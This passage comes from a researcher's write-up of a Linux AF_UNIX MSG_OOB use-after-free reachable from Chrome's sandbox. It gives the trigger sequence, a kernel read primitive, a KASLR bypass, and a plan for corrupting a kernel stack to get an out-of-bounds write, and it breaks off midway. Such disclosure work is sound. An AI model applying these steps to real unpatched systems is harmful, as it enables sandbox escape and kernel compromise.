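        assert(socketpair(AF_UNIX, SOCK_STREAM, 0, socks) == 0);

        assert(send(socks[1], "A", 1, MSG_OOB) == 1);
        assert(send(socks[1], "B", 1, MSG_OOB) == 1);

        /* "A" is no longer out-of-band: a normal recv() returns it... */
        assert(recv(socks[0], &c, 1, 0) == 1 && c == 'A');

        /* ...while "B" is still readable ahead of the queue via MSG_OOB. */
        assert(recv(socks[0], &c, 1, MSG_OOB) == 1 && c == 'B');

        printf("OK\n");
        return 0;
    }
    ```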

    Because the Chrome renderer sandbox allows stream-oriented UNIX domain sockets and didn't filter the flags arguments of send()/recv() functions, this esoteric feature was usable inside the sandbox.

    When a message (represented by a socket buffer / struct sk_buff, short SKB) is sent between two connected stream-oriented sockets, the message is added to the ->sk_receive_queue of the receiving socket, which is a linked list. An SKB has a length field ->len describing the length of data contained within it (counting both data in the SKB's "head buffer" as well as data indirectly referenced by the SKB in other ways). An SKB also contains some scratch space that can be used by the subsystem currently owning the SKB (char cb[48] in struct sk_buff); UNIX domain sockets access this scratch space with the helper #define UNIXCB(skb) (*(struct unix_skb_parms *)&((skb)->cb)), and one of the things they store in there is a field u32 consumed which stores the number of bytes of the SKB that have already been read from the socket. UNIX domain sockets count the remaining length of an SKB with the helper unix_skb_len(), which returns skb->len - UNIXCB(skb).consumed.
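    A minimal userspace model of that bookkeeping (fake_skb and the helper are deliberate simplifications; the real struct sk_buff keeps consumed inside the 48-byte cb[] scratch space):

    ```c
    #include <assert.h>
    #include <stdint.h>

    /* skb->len is the total payload, UNIXCB(skb).consumed counts bytes
     * already handed to userspace, and unix_skb_len() is their difference. */
    struct fake_skb {
        uint32_t len;       /* total data in the SKB */
        uint32_t consumed;  /* bytes already read from the socket */
    };

    static uint32_t fake_unix_skb_len(const struct fake_skb *skb)
    {
        return skb->len - skb->consumed;
    }

    int main(void)
    {
        struct fake_skb skb = { .len = 1, .consumed = 0 };
        assert(fake_unix_skb_len(&skb) == 1);

        /* After recv(..., MSG_OOB) consumes the single OOB byte, the SKB
         * stays queued but its remaining length drops to 0. */
        skb.consumed += 1;
        assert(fake_unix_skb_len(&skb) == 0);
        return 0;
    }
    ```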

    MSG_OOB messages (sent with something like send(sockfd, &message_byte, 1, MSG_OOB), which goes through queue_oob() in the kernel) are also added to the ->sk_receive_queue just like normal messages; but to allow the receiving socket to access the latest out-of-band message ahead of the rest of the queue, the ->oob_skb pointer of the receiving socket is updated to point to this message. When the receiving socket receives an OOB message with something like recv(sockfd, &received_byte, 1, MSG_OOB) (implemented in unix_stream_recv_urg()), the corresponding socket buffer stays on the ->sk_receive_queue, but its consumed field is incremented, causing its remaining length (unix_skb_len()) to become 0, and the ->oob_skb pointer is cleared; the normal receive path will have to deal with this when encountering the remaining-length-0 SKB.

    This means that the normal recv() path (unix_stream_read_generic()), which runs when recv() is called without MSG_OOB, must be able to deal with remaining-length-0 SKBs and must take care to clear the ->oob_skb pointer when it deletes an OOB SKB. manage_oob() is supposed to take care of this. Essentially, when the normal receive path obtains an SKB from the ->sk_receive_queue, it calls manage_oob() to take care of all the fixing-up required to deal with the OOB mechanism; manage_oob() will then return the first SKB that contains at least 1 byte of remaining data, and manage_oob() ensures that this SKB is no longer referenced as ->oob_skb. unix_stream_read_generic() can then proceed as if the OOB mechanism didn't exist.

    Backstory: The bug, and what led to it

    In mid-2024, a userspace API inconsistency was discovered, where recv() could spuriously return 0 (which normally signals end-of-file) when trying to read from a socket with a receive queue that contains a remaining-length-0 SKB left behind by receiving an OOB SKB. The fix for this issue introduced two closely related security issues that can lead to UAF; it was marked as fixing a bug introduced by the original MSG_OOB implementation, but luckily was actually only backported to Linux 6.9.8, so the buggy fix did not land in older LTS kernel branches.

    After the buggy fix, manage_oob() looked as follows:

    static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
                                      int flags, int copied)
    {
            struct unix_sock *u = unix_sk(sk);

            if (!unix_skb_len(skb)) {
                    struct sk_buff *unlinked_skb = NULL;

                    spin_lock(&sk->sk_receive_queue.lock);

                    if (copied) {
                            skb = NULL;
                    } else if (flags & MSG_PEEK) {
                            skb = skb_peek_next(skb, &sk->sk_receive_queue);
                    } else {
                            unlinked_skb = skb;
                            skb = skb_peek_next(skb, &sk->sk_receive_queue);
                            __skb_unlink(unlinked_skb, &sk->sk_receive_queue);
                    }

                    spin_unlock(&sk->sk_receive_queue.lock);

                    consume_skb(unlinked_skb);
            } else {
                    struct sk_buff *unlinked_skb = NULL;

                    spin_lock(&sk->sk_receive_queue.lock);

                    if (skb == u->oob_skb) {
                            if (copied) {
                                    skb = NULL;
                            } else if (!(flags & MSG_PEEK)) {
                                    if (sock_flag(sk, SOCK_URGINLINE)) {
                                            WRITE_ONCE(u->oob_skb, NULL);
                                            consume_skb(skb);
                                    } else {
                                            __skb_unlink(skb, &sk->sk_receive_queue);
                                            WRITE_ONCE(u->oob_skb, NULL);
                                            unlinked_skb = skb;
                                            skb = skb_peek(&sk->sk_receive_queue);
                                    }
                            } else if (!sock_flag(sk, SOCK_URGINLINE)) {
                                    skb = skb_peek_next(skb, &sk->sk_receive_queue);
                            }
                    }

                    spin_unlock(&sk->sk_receive_queue.lock);

                    if (unlinked_skb) {
                            WARN_ON_ONCE(skb_unref(unlinked_skb));
                            kfree_skb(unlinked_skb);
                    }
            }

            return skb;
    }


    After this change, syzbot (the public syzkaller instance operated by Google) reported that a use-after-free occurs in the following scenario, as described by the fix commit for the syzbot-reported issue:

      1. send(MSG_OOB)
      2. recv(MSG_OOB)
         -> The consumed OOB remains in recv queue
      3. send(MSG_OOB)
      4. recv()
         -> manage_oob() returns the next skb of the consumed OOB
         -> This is also OOB, but unix_sk(sk)->oob_skb is not cleared
      5. recv(MSG_OOB)
         -> unix_sk(sk)->oob_skb is used but already freed


    In other words, the issue is that when the receive queue looks like this (shown with the oldest message at the top):

    • SKB 1: unix_skb_len()=0
    • SKB 2: unix_skb_len()=1 <--OOB pointer

    and a normal recv() happens, then manage_oob() takes the !unix_skb_len(skb) branch, which deletes the SKB with remaining length 0 and skips forward to the following SKB; but it then doesn't go through the skb == u->oob_skb check as it otherwise would, which means it doesn't clear out the ->oob_skb pointer before the SKB is consumed by the normal receive path, creating a dangling pointer that will lead to UAF on a subsequent recv(... MSG_OOB).

    This issue was fixed, making the checks for remaining-length-0 SKBs and ->oob_skb in manage_oob() independent:

    static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
                                      int flags, int copied)
    {
            struct sk_buff *read_skb = NULL, *unread_skb = NULL;
            struct unix_sock *u = unix_sk(sk);

            if (likely(unix_skb_len(skb) && skb != READ_ONCE(u->oob_skb)))
                    return skb;

            spin_lock(&sk->sk_receive_queue.lock);

            if (!unix_skb_len(skb)) {
                    if (copied && (!u->oob_skb || skb == u->oob_skb)) {
                            skb = NULL;
                    } else if (flags & MSG_PEEK) {
                            skb = skb_peek_next(skb, &sk->sk_receive_queue);
                    } else {
                            read_skb = skb;
                            skb = skb_peek_next(skb, &sk->sk_receive_queue);
                            __skb_unlink(read_skb, &sk->sk_receive_queue);
                    }

                    if (!skb)
                            goto unlock;
            }

            if (skb != u->oob_skb)
                    goto unlock;

            if (copied) {
                    skb = NULL;
            } else if (!(flags & MSG_PEEK)) {
                    WRITE_ONCE(u->oob_skb, NULL);

                    if (!sock_flag(sk, SOCK_URGINLINE)) {
                            __skb_unlink(skb, &sk->sk_receive_queue);
                            unread_skb = skb;
                            skb = skb_peek(&sk->sk_receive_queue);
                    }
            } else if (!sock_flag(sk, SOCK_URGINLINE)) {
                    skb = skb_peek_next(skb, &sk->sk_receive_queue);
            }

    unlock:
            spin_unlock(&sk->sk_receive_queue.lock);

            consume_skb(read_skb);
            kfree_skb(unread_skb);

            return skb;
    }


    But a remaining issue is that when this function discovers a remaining-length-0 SKB left behind by recv(..., MSG_OOB), it skips ahead to the next SKB and assumes that it is not also a remaining-length-0 SKB. If this assumption is broken, manage_oob() can return a pointer to the second remaining-length-0 SKB, which is bad because the caller unix_stream_read_generic() does not expect to see remaining-length-0 SKBs:

    static int unix_stream_read_generic(struct unix_stream_read_state *state,
                                        bool freezable)
    {
    [...]
            int flags = state->flags;
    [...]
            int skip;
    [...]
            skip = max(sk_peek_offset(sk, flags), 0); // 0 if MSG_PEEK isn't set

            do {
                    struct sk_buff *skb, *last;
    [...]
                    last = skb = skb_peek(&sk->sk_receive_queue);
                    last_len = last ? last->len : 0;

    again:
    #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
                    if (skb) {
                            skb = manage_oob(skb, sk, flags, copied);
                            if (!skb && copied) {
                                    unix_state_unlock(sk);
                                    break;
                            }
                    }
    #endif
                    if (skb == NULL) {
    [...]
                    }

                    while (skip >= unix_skb_len(skb)) {
                            skip -= unix_skb_len(skb);
                            last = skb;
                            last_len = skb->len;
                            skb = skb_peek_next(skb, &sk->sk_receive_queue);
                            if (!skb)
                                    goto again;
                    }
    [...]
                    /* Mark read part of skb as used */
                    if (!(flags & MSG_PEEK)) {
                            UNIXCB(skb).consumed += chunk;
    [...]
                            if (unix_skb_len(skb))
                                    break;

                            skb_unlink(skb, &sk->sk_receive_queue);
                            consume_skb(skb); // frees the SKB

                            if (scm.fp)
                                    break;
                    } else {

    If MSG_PEEK is not set (which is the only case in which SKBs can actually be freed), skip is always 0, and the while (skip >= unix_skb_len(skb)) loop condition should always be false; but when a remaining-length-0 SKB unexpectedly gets here, the condition turns into 0 >= 0, and the loop skips ahead to the first SKB that does not have remaining length 0. That SKB could be the ->oob_skb; in which case this again bypasses the logic in manage_oob() that is supposed to set ->oob_skb to NULL before the current ->oob_skb can be freed.

    So the remaining bug can be triggered by first doing the following twice, creating two remaining-length-0 SKBs in the ->sk_receive_queue:

    send(socks[1], "A", 1, MSG_OOB);
    recv(socks[0], &dummy, 1, MSG_OOB);

    If another OOB SKB is then sent with send(socks[1], "A", 1, MSG_OOB), the ->sk_receive_queue will look like this:

    • SKB 1: unix_skb_len()=0
    • SKB 2: unix_skb_len()=0
    • SKB 3: unix_skb_len()=1 <--OOB pointer

    Now, recv(socks[0], &dummy, 1, 0) will trigger the bug and free SKB 3 while leaving ->oob_skb pointing to it; making it possible for subsequent recv() syscalls with MSG_OOB to use the dangling pointer.

    The initial primitive

    This bug yields a dangling ->oob_skb pointer. Pretty much the only way to use that dangling pointer is the recv() syscall with MSG_OOB, either with or without MSG_PEEK, which is implemented in unix_stream_recv_urg(). (There are other codepaths that touch it, but they're mostly just pointer comparisons, with the exception of the unix_ioctl() handler for SIOCATMARK, which is blocked in Chrome's seccomp sandbox.)

    unix_stream_recv_urg() does this:

    static int unix_stream_recv_urg(struct unix_stream_read_state *state)
    {
            struct socket *sock = state->socket;
            struct sock *sk = sock->sk;
            struct unix_sock *u = unix_sk(sk);
            int chunk = 1;
            struct sk_buff *oob_skb;

            mutex_lock(&u->iolock);
            unix_state_lock(sk);
            spin_lock(&sk->sk_receive_queue.lock);

            if (sock_flag(sk, SOCK_URGINLINE) || !u->oob_skb) {
    [...]
            }

            // read dangling pointer
            oob_skb = u->oob_skb;

            if (!(state->flags & MSG_PEEK))
                    WRITE_ONCE(u->oob_skb, NULL);

            spin_unlock(&sk->sk_receive_queue.lock);
            unix_state_unlock(sk);

            // read primitive
            // ->recv_actor() is unix_stream_read_actor()
            chunk = state->recv_actor(oob_skb, 0, chunk, state);

            if (!(state->flags & MSG_PEEK))
                    UNIXCB(oob_skb).consumed += 1; // write primitive

            mutex_unlock(&u->iolock);

            if (chunk < 0)
                    return -EFAULT;

            state->msg->msg_flags |= MSG_OOB;
            return 1;
    }


    At a high level, the call to state->recv_actor() (which goes down the call path unix_stream_read_actor -> skb_copy_datagram_msg -> skb_copy_datagram_iter -> __skb_datagram_iter(cb=simple_copy_to_iter)) gives a read primitive: it is trying to copy one byte of data referenced by the oob_skb to userspace, so by replacing the memory pointed to by oob_skb with controlled, repeatedly writable data, it is possible to repeatedly cause copy_to_user(<userspace pointer>, <kernel pointer>, 1) with arbitrary kernel pointers. As long as MSG_PEEK is set, this can be repeated; only when MSG_PEEK is clear is the ->oob_skb pointer cleared.

    The only write primitive this bug yields is the increment UNIXCB(oob_skb).consumed += 1 that happens when MSG_PEEK is not set. In the build I'm looking at, the consumed field that is incremented is located 0x44 bytes into the oob_skb, an object which is effectively allocated with an alignment of 0x100 bytes. This means that, if the write primitive is applied to a 64-bit length value or a pointer, it would have to do an increment at offset 4 relative to the 8-byte aligned overwrite target, and it would effectively increment the 64-bit pointer/length by 4 GiB.
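    The effect of that misaligned increment can be checked with a few lines of C. This models the write primitive on a little-endian machine (as on x86-64); bump_at_offset_4 is an illustrative name, not anything from the kernel.

    ```c
    #include <assert.h>
    #include <stdint.h>
    #include <string.h>

    /* Increment the u32 at byte offset 4 of a little-endian 64-bit value.
     * As long as that u32 doesn't wrap, this adds exactly 2^32 (4 GiB) to
     * the 64-bit quantity. */
    static uint64_t bump_at_offset_4(uint64_t v)
    {
        uint32_t hi;
        memcpy(&hi, (char *)&v + 4, 4);  /* the 4 bytes the increment hits */
        hi += 1;                         /* the UNIXCB(oob_skb).consumed += 1 */
        memcpy((char *)&v + 4, &hi, 4);
        return v;
    }

    int main(void)
    {
        assert(bump_at_offset_4(0x1000) == 0x1000 + (1ULL << 32));
        return 0;
    }
    ```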

    My exploit for this issue

    Discarded strategy for using the write primitive: Pointer increment

    It would be possible to free the sk_buff and reallocate it as some structure containing a pointer at offset 0x40. The write primitive would effectively increment this pointer by 4 GiB (because it would increment by 1 at an offset 4 bytes into the pointer). But this would fundamentally rely on the machine having significantly more than 4 GiB of RAM, which feels gross and a bit like cheating.

    Overall strategy

    Since this issue relatively straightforwardly leads to a semi-arbitrary read (subject to usercopy hardening restrictions), but the write primitive is much more gnarly, I decided to go with the general approach of: first get the read primitive working; then use the read primitive to assist in exploiting the write primitive. This way, ideally everything after the read primitive bootstrapping can be made reliable with enough work.

    Dealing with per-cpu state

    Lots of things in this exploit rely on per-cpu kernel data structures and will fail if a task is migrated between CPUs at the wrong time. In some places in the exploit, I repeatedly check which CPU the exploit is running on with sched_getcpu(), and retry if the CPU number changed; though I was too lazy to do that everywhere perfectly, and this could be done even better by relying more directly on the "restartable sequences" subsystem.

    Note that the Chrome sandbox policy forbids __NR_getcpu; but that has no effect at all on sched_getcpu(), in particular on x86-64, because there are two faster alternatives to the getcpu() syscall that glibc prefers to use instead:

    • The kernel's rseq subsystem maintains a struct rseq in userspace for each thread, which contains the cpu_id that the thread is currently running on; if rseq is available, glibc will read from the rseq struct.
    • On x86-64, the vDSO contains a pure-userspace implementation of the getcpu() syscall which relies on either the RDPID instruction or, if that is not available, the LSL instruction to determine the ID of the current CPU without having to perform a syscall. (This is implemented in vdso_read_cpunode() in the kernel sources, which is compiled into the vDSO that is mapped into userspace.)
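    The retry-on-migration pattern described above can be sketched as follows; do_step() is a placeholder for whatever per-cpu-sensitive work the exploit performs between the two checks.

    ```c
    #define _GNU_SOURCE
    #include <assert.h>
    #include <sched.h>
    #include <stdio.h>

    static void do_step(void)
    {
        /* per-cpu-sensitive work would go here */
    }

    int main(void)
    {
        int cpu_before, cpu_after;

        /* Record the CPU before the critical sequence and redo the whole
         * sequence if sched_getcpu() reports a migration afterwards. */
        do {
            cpu_before = sched_getcpu();
            do_step();
            cpu_after = sched_getcpu();
        } while (cpu_before != cpu_after);

        assert(cpu_after >= 0);
        printf("ran on cpu %d\n", cpu_after);
        return 0;
    }
    ```

    Note that sched_getcpu() never enters the kernel here, for exactly the reasons listed above (rseq or the vDSO), which is why the seccomp block on __NR_getcpu doesn't matter.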

    Setting up the read primitive - mostly boring spraying

    On the targeted Debian kernel, struct sk_buff is in the skbuff_head_cache SLUB cache, which normally uses order-1 unmovable pages. I had trouble finding a good reallocation primitive that also uses order-1 pages (though maple_node might have been an option); so I went for reallocation as a pipe page (order-0 unmovable), though that means that the reallocation will go through the buddy allocator and requires the order-0 unmovable list to become empty so that an order-1 page is split up.

    This is not very novel, so I will only describe a few interesting aspects of the strategy here - if you want a better understanding of how to free a SLUB page and reallocate it as something else, there are plenty of existing writeups, including one I wrote a while ago (section "Attack stage: Freeing the object's page to the page allocator"), though that one does not discuss the buddy allocator.

    To make it more likely for a reallocation of an order-1 page as an order-0 page to succeed, the exploit starts by allocating a large number of order-0 unmovable pages to drain the order-0 and order-1 unmovable freelists. Most ways of allocating large amounts of kernel memory are limited in the sandbox; in particular, the default file descriptor table size soft limit (RLIMIT_NOFILE) is 4096 on Debian (Chrome leaves this limit as-is), and I can neither use setrlimit() to bump that number up (due to seccomp) nor create subprocesses with separate file descriptor tables. (A real exploit might be able to work around this by exploiting several renderer processes, though that seems like a pain.) The one primitive I have for allocating large amounts of unmovable pages are page tables: by creating a gigantic anonymous VMA (read-only to avoid running into Chrome's RLIMIT_DATA restrictions) and then triggering read faults all over this VMA, an unlimited number of page tables can be allocated. I use this to spam around 10% of total RAM with page tables. (To figure out how much RAM the machine has, I'm testing whether mmap() works with different sizes, relying on the OVERCOMMIT_GUESS behavior of __vm_enough_memory(); though that doesn't actually work precisely in the sandbox due to the RLIMIT_DATA limit. A cleaner and less noisy way might be to actually fill up RAM and use mincore() to figure out how large the working set can get before pages get swapped out or discarded.)
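    A scaled-down sketch of the page-table spray described above. The sizes here are tiny compared to the real exploit (which targets ~10% of RAM); the point is that one last-level page table covers 2 MiB of virtual address space on x86-64, so one read fault per 2 MiB forces one unmovable page-table page allocation even though every fault just maps the shared zero page.

    ```c
    #include <assert.h>
    #include <stddef.h>
    #include <sys/mman.h>

    int main(void)
    {
        size_t span = 64UL << 20;  /* 64 MiB -> ~32 page-table pages */

        /* Read-only anonymous mapping, as in the exploit (read-only to
         * stay under Chrome's RLIMIT_DATA restrictions). */
        volatile char *p = mmap(NULL, span, PROT_READ,
                                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        assert(p != MAP_FAILED);

        unsigned sum = 0;
        for (size_t off = 0; off < span; off += 2UL << 20)
            sum += p[off];  /* read fault populates one PTE page each */

        assert(sum == 0);   /* fresh anonymous memory reads as zero */
        munmap((void *)p, span);
        return 0;
    }
    ```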

    Afterwards, I create 41 UNIX domain sockets and use them to spam 256 SKB allocations each; since each SKB uses 0x100 bytes, this allocates a bit over 2.5 MiB of kernel memory. That is enough to later flush a slab page out of both SLUB's per-cpu partial list and the page allocator's per-cpu freelist, all the way into the buddy allocator.

    Then I set up a SLUB page containing a dangling pointer, try to flush this page all the way into the buddy allocator, and reallocate it as a pipe page by using 256 pipes to each allocate 2 pages (which is the minimum size that a pipe always has, see PIPE_MIN_DEF_BUFFERS). This allocates 256 × 2 × 4 KiB = 2 MiB worth of order-0 pages.

    At this point, I have probably reallocated the SKB as a pipe page; but I don't know in which pipe the SKB is located, or at which offset. To figure that out, I store fake SKBs in the pipe pages that point to different data; then, by triggering the bug with recv(..., MSG_OOB|MSG_PEEK), I can read one byte at the pointed-to location and narrow down where in which pipe the SKB is. I don't know the addresses of any kernel objects yet; but the x86-64 implementation of copy_to_user() is symmetric and also works if you pass a userspace pointer as the source, so I can simply use userspace data pointers in the crafted SKBs for now. (SMAP is not an issue here - SMAP is disabled for all memory accesses in copy_to_user(). On x86-64, copy_to_user() is actually implemented as a wrapper around copy_user_generic(), which is a helper that accepts both kernel and userspace addresses as source and destination.)

    Afterwards, I have the ability to call copy_to_user(..., 1) on arbitrary kernel pointers through recv(..., MSG_OOB|MSG_PEEK) using the controlled SKB.

    Properties of the read primitive

    One really cool aspect of a copy_to_user()-based read primitive on x86-64 is that it doesn't crash even when called on invalid kernel pointers - if the kernel memory access fails, the recv() syscall will simply return an error (-EFAULT).

    The main limitation is that usercopy hardening (__check_object_size()) will catch attempts to read from some specific memory ranges:

    • Ranges that wrap around - not an issue here, only ranges of length 1 can be used anyway.
    • Addresses <=16 - not an issue here.
    • The kernel stack of the current process, if some other criteria are met. Not an issue here - even if I want to read from a kernel stack, I'll probably want to read the kernel stack of another thread, which isn't protected.
    • The kernel .text section - all of .data and such is accessible, just .text is restricted. When targeting a specific kernel build, that's not really relevant.
    • kmap() mappings - those don't exist on x86-64.
    • Freed vmalloc allocations, or ranges that straddle the bounds of a vmalloc allocation. Not an issue here.
    • Ranges in the direct mapping, or in the kernel image address range, that straddle the bounds of a high-order folio. Not an issue here, only ranges of length 1 can be used anyway.
    • Ranges in the direct mapping, or in the kernel image address range, that are used as SLUB pages in non-kmalloc slab caches, at offsets not allowed by usercopy allowlisting (see __check_heap_object()). This is the most annoying part.

    (There might be other ways of using this bug to read memory with different constraints, like by using the frag_iter->len read in __skb_datagram_iter() to influence an offset from which known data is subsequently read, but that seems like a pain to work with.)

    Locating the kernel image

    To break KASLR of the kernel image at this point, there are lots of options, partially thanks to copy_to_user() not crashing on access to invalid addresses; but one nice option is to read an Interrupt Descriptor Table (IDT) entry through the read-only IDT mapping at the fixed address 0xfffffe0000000000 (CPU_ENTRY_AREA_RO_IDT_VADDR), which yields the address of a kernel interrupt handler.
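    The leaked IDT bytes translate into a kernel .text address because an x86-64 interrupt gate descriptor splits the 64-bit handler address into three fields. A sketch of the reconstruction, using the standard gate descriptor layout (the handler address in the test is made up):

    ```c
    #include <assert.h>
    #include <stdint.h>

    struct idt_gate {            /* x86-64 gate descriptor layout */
        uint16_t offset_low;     /* handler bits 0..15 */
        uint16_t segment;
        uint16_t bits;           /* IST, type, DPL, P */
        uint16_t offset_mid;     /* handler bits 16..31 */
        uint32_t offset_high;    /* handler bits 32..63 */
        uint32_t reserved;
    };

    /* Stitch the three offset fields back into the handler address. */
    static uint64_t gate_to_handler(const struct idt_gate *g)
    {
        return (uint64_t)g->offset_low |
               ((uint64_t)g->offset_mid << 16) |
               ((uint64_t)g->offset_high << 32);
    }

    int main(void)
    {
        /* Synthetic entry encoding the made-up handler 0xffffffff81a01230 */
        struct idt_gate g = {
            .offset_low  = 0x1230,
            .offset_mid  = 0x81a0,
            .offset_high = 0xffffffff,
        };
        assert(gate_to_handler(&g) == 0xffffffff81a01230ULL);
        return 0;
    }
    ```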

    Using the read primitive to observe allocator state and other things

    From here on, my goal is to use the read primitive to assist in exploiting the write primitive; I would like to be able to answer questions like:

    • What is the mapping between struct page */struct ptdesc */struct slab * and the corresponding region in the direct mapping? (This is easy and just requires reading some global variables out of the .data/.bss sections.)
    • At which address will the next sk_buff allocation be?
    • What is the current state of this particular page?
    • Where are my page tables located, and which physical address does a given virtual address map to?

    Because usercopy hardening blocks access to objects in specialized slabs, reading the contents of a struct kmem_cache is not possible, because a kmem_cache is allocated from a specialized slab type which does not allow usercopy. But there are many important pieces of kernel memory that are readable, so it is possible to work around that:

    • The kernel .data/.bss sections, which contain things like pointers to kmem_cache instances.
    • The vmemmap region, which contains all instances of struct page/struct folio/struct ptdesc/struct slab (these types all together effectively form a union) which describe the status of each page. These also contain things like a SLUB freelist head pointer; a pointer to the kmem_cache associated with a given SLUB page; or an intrusive linked list element tying together the root page tables of all processes.
    • Kernel stacks of other threads (located in vmalloc memory).
    • Per-CPU memory allocations (located in vmalloc memory), which are used in particular for memory allocation fastpaths in SLUB and the page allocator; and also the metadata describing where the per-cpu memory ranges are located.
    • Page tables.

    So to observe the state of the SLUB allocator for a given slab cache, it is possible to first read the corresponding kmem_cache* from the kernel .data/.bss section, then scan through all per-cpu memory for objects that look like a struct kmem_cache_cpu (with a struct slab * and a freelist pointer pointing into the corresponding direct mapping range), and check which kmem_cache the struct slab's kmem_cache* points to, in order to determine whether the kmem_cache_cpu is for the right slab cache. Afterwards, the read primitive can be used to read the slab cache's per-cpu freelist head pointer out of the struct kmem_cache_cpu.

    To observe the state of a struct page/struct slab/..., the read primitive can be used to simply read the page's refcount and mapcount (which contains type information). This makes it possible to observe things like "has this page been freed yet or is it still allocated" and "as what type of page has this page been reallocated".

    To locate the page table root of the current process, it is similarly not possible to directly go through the mm_struct because that is allocated from a specialized slab type which does not allow usercopy (except in the saved_auxv field). But one way to work around this is to instead walk the global linked list of all root page tables (pgd_list), which stores its elements inside struct ptdesc, and search for a struct ptdesc which has a pt_mm field that points to the mm_struct of the current process. The address of this mm_struct can be obtained from the per-cpu variable cpu_tlbstate.loaded_mm. Afterwards, the page tables can be walked through the read primitive.

    Finding a reallocation target: The magic of CONFIG_RANDOMIZE_KSTACK_OFFSET

    Having already discarded the "bump a pointer by 4 GiB" and "reallocate as a maple tree node" strategies, I went looking for some other allocation which would place an object such that incrementing the value at address 0x...44 leads to a nice primitive. It would be nice to have something there like an important flags field, or a length specifying the size of a pointer array, or something like that. I spent a lot of time looking at various object types that can be allocated on the kernel heap from inside the Chrome sandbox, but found nothing great.

    Eventually, I realized that I had been going down the wrong path. Clearly trying to target a heap object was foolish, because there is something much better: It is possible to reallocate the target page as the topmost page of a kernel stack!

    That might initially sound like a silly idea; but Debian's kernel config enables CONFIG_RANDOMIZE_KSTACK_OFFSET=y and CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT=y, causing each syscall invocation to randomly shift the stack pointer down by up to 0x3f0 bytes, with 0x10-byte granularity. That is supposed to be a security mitigation, but works to my advantage when I already have an arbitrary read: instead of having to find an overwrite target that is at a 0x44-byte distance from the preceding 0x100-byte boundary, I effectively just have to find an overwrite target that is at a 0x4-byte distance from the preceding 0x10-byte boundary, and then keep doing syscalls and checking at what stack depth they execute until I randomly get lucky and the stack lands in the right position.
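    A quick simulation of the odds this gives. The shift is a multiple of 0x10 in [0, 0x3f0], i.e. 64 equally likely values; slot_addr is a hypothetical spill-slot address that sits 4 bytes past a 0x10-byte boundary, and the write can only hit addresses ending in 0x44 mod 0x100.

    ```c
    #include <assert.h>
    #include <stdint.h>
    #include <stdio.h>

    /* Count the randomized stack shifts that land the slot on an address
     * congruent to 0x44 mod 0x100. */
    static int count_good_shifts(uint64_t slot_addr)
    {
        int hits = 0;
        for (uint64_t shift = 0; shift <= 0x3f0; shift += 0x10)
            if (((slot_addr - shift) & 0xff) == 0x44)
                hits++;
        return hits;
    }

    int main(void)
    {
        int hits = count_good_shifts(0xffffc90000a0fd34ULL);
        /* 4 of the 64 shifts work: a ~1/16 chance per syscall invocation. */
        printf("%d of 64 shifts work\n", hits);
        assert(hits == 4);
        return 0;
    }
    ```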

    With that in mind, I went looking for an overwrite target on the stack, strongly inspired by Seth's exploit that overwrote a spilled register containing a length used in copy_from_user. Targeting a normal copy_from_user() directly wouldn't work here - if I incremented the 64-bit length used inside copy_from_user() by 4 GiB, then even if the copy failed midway through due to a userspace fault, copy_from_user() would try to memset() the remaining kernel memory to zero.

    I discovered that, on the codepath pipe_write -> copy_page_from_iter -> copy_from_iter, the 64-bit length variable bytes of copy_page_from_iter() is stored in register R14, which is spilled to the stack frame of copy_from_iter(); and this stack spill is in a stack location where I can clobber it.

    When userspace calls write() on a pipe, the kernel constructs an iterator (struct iov_iter) that encapsulates the userspace memory range passed to write(). (There are different types of iterators that can encapsulate a single userspace range, a set of userspace ranges, or various types of kernel memory.) Then, pipe_write() (which is called anon_pipe_write() in newer kernels) essentially runs a loop which allocates a new pipe_buffer slot in the pipe, places a new page allocation in this pipe buffer slot, and copies up to a page worth of data (PAGE_SIZE bytes) from the iov_iter to the pipe buffer slot's page using copy_page_from_iter(). copy_page_from_iter() effectively receives two length values: The number of bytes that fit into the caller-provided page (bytes, initially set to PAGE_SIZE here) and the number of bytes available in the struct iov_iter encapsulating the userspace memory range (i->count). The amount of data that will actually be copied is limited by both.

    If I manage to increment the spilled register R14 which contains bytes by 4 GiB while copy_from_iter() is busy copying data into the kernel, then after copy_from_iter() returns, copy_page_from_iter() will effectively no longer be bounded by bytes, only by i->count (based on the length userspace passed to write()); so it will do a second iteration, which copies into out-of-bounds memory behind the pipe buffer page. If userspace calls write(fd, buf, 0x3000), and the overwrite happens in the middle of copying bytes 0x1000-0x1fff of the userspace buffer into the second pipe buffer page, then bytes 0x2000-0x2fff will be written out-of-bounds behind the second pipe buffer page, at which point i->count will drop to 0, terminating the operation.

    Reallocating a SLUB page as a stack page, with arb-read assistance

    So to get the ability to increment-after-free a value in a stack page, I again start by draining the low-order page allocator caches. But this time, the arb-read can be used to determine when an object at the right in-page offset is at the top of the SLUB freelist for the sk_buff slub cache; and the arb-read can also determine whether I managed to allocate an entire slab page worth of objects, with no other objects mixed in. Then, when flushing the page out of the SLUB allocator, the arb-read helps to verify that the page really has been freed (its refcount field should drop to 0); and afterwards, the page is flushed out of the page allocator's per-cpu freelist.

    Then, to reallocate the page, I run a loop that first allocates a pipe page, then checks the refcount field of the target page. If the refcount of the target page goes up, I probably found the target page, and can exit the loop; otherwise, I free the pipe page again, reallocate it as a page table to drain the page away, and try again. (Directly allocating as a page table would be cumbersome because page tables have RCU lifetime, so once a page has been allocated as a page table, it is hard to reallocate it. Keeping drained pages in pipe buffers might not work well due to the low file descriptor table size, and each pipe FD pair potentially only being able to reference two pages.)

    Once I have reallocated the target page as a pipe buffer, I free it again, then free three more pages (from other helper pipes), and then create a new thread with the clone() syscall. If everything goes well, clone() will allocate four pages for the new kernel stack: First the three other pages I freed last, and then the target page as the last page of the stack. By walking the page tables, I can verify that the target page really got reused as the last page of the target stack.

    Remaining prerequisites for using the write primitive

    At this point, I have the write primitive set up such that I can trigger it on a specific stack memory location. The write primitive essentially first reads some surrounding (stack) memory (in unix_stream_read_actor() and its callees skb_copy_datagram_msg -> skb_copy_datagram_iter) and expects that memory to have a certain structure before incrementing the value at a specific stack location.

    I also know what stack allocation I want to overwrite.

    The remaining issues are:

    1. I need to ensure that an OOB copy_from_user() behind a pipe buffer page will overwrite some data that helps in compromising the kernel.
    2. I need to be able to detect at what stack depth pipe_write() is running, and depending on that either try again or proceed to trigger the bug.
    3. The UAF reads preceding the UAF increment need to see the right kind of data to avoid crashing.
